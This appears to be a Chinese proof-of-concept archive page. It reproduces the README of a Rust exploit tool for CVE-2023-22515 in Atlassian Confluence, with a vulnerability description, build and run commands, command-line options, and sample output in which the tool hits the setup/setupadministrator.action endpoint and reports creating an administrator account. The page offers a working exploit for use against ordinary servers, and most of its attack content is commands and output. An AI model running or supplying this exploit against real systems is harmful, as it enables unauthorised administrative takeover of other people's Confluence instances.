关联漏洞
标题:
Atlassian Confluence Server 安全漏洞
(CVE-2023-22515)
描述:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server存在安全漏洞,该漏洞源于外部攻击者可能利用可公开访问的Confluence Data Center和Confluence Serve,用未知的漏洞来创建Confluence 管理员帐户并访问 Confluence 实例。
描述
CVE-2023-22515 (Confluence Broken Access Control Exploit)
介绍
# CVE-2023-22515
<p align="left">
<a href="https://www.rust-lang.org/"><img src="https://img.shields.io/badge/made%20with-Rust-red"></a>
<a href="#"><img src="https://img.shields.io/badge/platform-osx%2Flinux%2Fwindows-blueviolet"></a>
</p>
- [Overview](#overview)
- [Compile](#compile)
- [Usage](#usage)
- [Running CVE-2023-22515](#running-cve-2023-22515)
# Overview
Confluence is a web-based enterprise wiki developed by Australian software company Atlassian.
Atlassian has been made aware of an issue reported by some customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence server and data center instances to create unauthorized Confluence administrator accounts and access Confluence instances.
The vulnerability has been classified as ```CVE-2023-22515```
# Compile
First perform the compilation with the command:
```sh
cargo build --release
```
# Usage
You can do it in these two ways:
```sh
cargo run -- --target http://localhost --username "teste" --password "teste"
```
```sh
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste"
```
This will display help for the tool. Here are all the switches it supports:
```yaml
CVE-2023-22515
Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>
Options:
-t, --target <TARGET> Insert target
-u, --username <USERNAME> Insert username
-p, --password <PASSWORD> Insert password
-h, --help Print help
```
# Running CVE-2023-22515
```console
cargo run -- --target http://example.com --username "teste" --password "teste"
[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
```
文件快照
[4.0K] /data/pocs/482752d31a03385814240c825cf76faf4fe56043
├── [ 32K] Cargo.lock
├── [ 307] Cargo.toml
├── [1.9K] README.md
└── [4.0K] src
└── [3.3K] main.rs
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。